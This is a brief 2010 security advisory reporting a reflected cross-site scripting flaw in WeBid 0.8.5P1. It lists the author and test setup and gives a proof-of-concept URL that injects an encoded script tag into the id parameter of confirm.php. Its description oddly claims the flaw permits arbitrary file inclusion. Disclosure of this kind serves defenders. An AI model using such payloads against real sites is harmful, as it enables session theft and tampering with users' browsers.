WeBid version 0.8.5P1 suffers from a cross site scripting vulnerability.
f0ff17211f2f42b8ea38d8389d38335766bf84651af3a0a89477ffa0754f600f
------------------------------------------------------------------------
Software................WeBid 0.8.5P1
Vulnerability...........Reflected Cross-site Scripting
Download................http://www.webidsupport.com/
Release Date............11/8/2010
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://www.johnleitch.net/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------
--Description--
A reflected cross-site scripting vulnerability in WeBid 0.8.5P1 can be
exploited to include arbitrary files.
--PoC--
http://localhost/webid/confirm.php?id=%22%3E%3Cscript%3Ealert(0)%3C/script%3E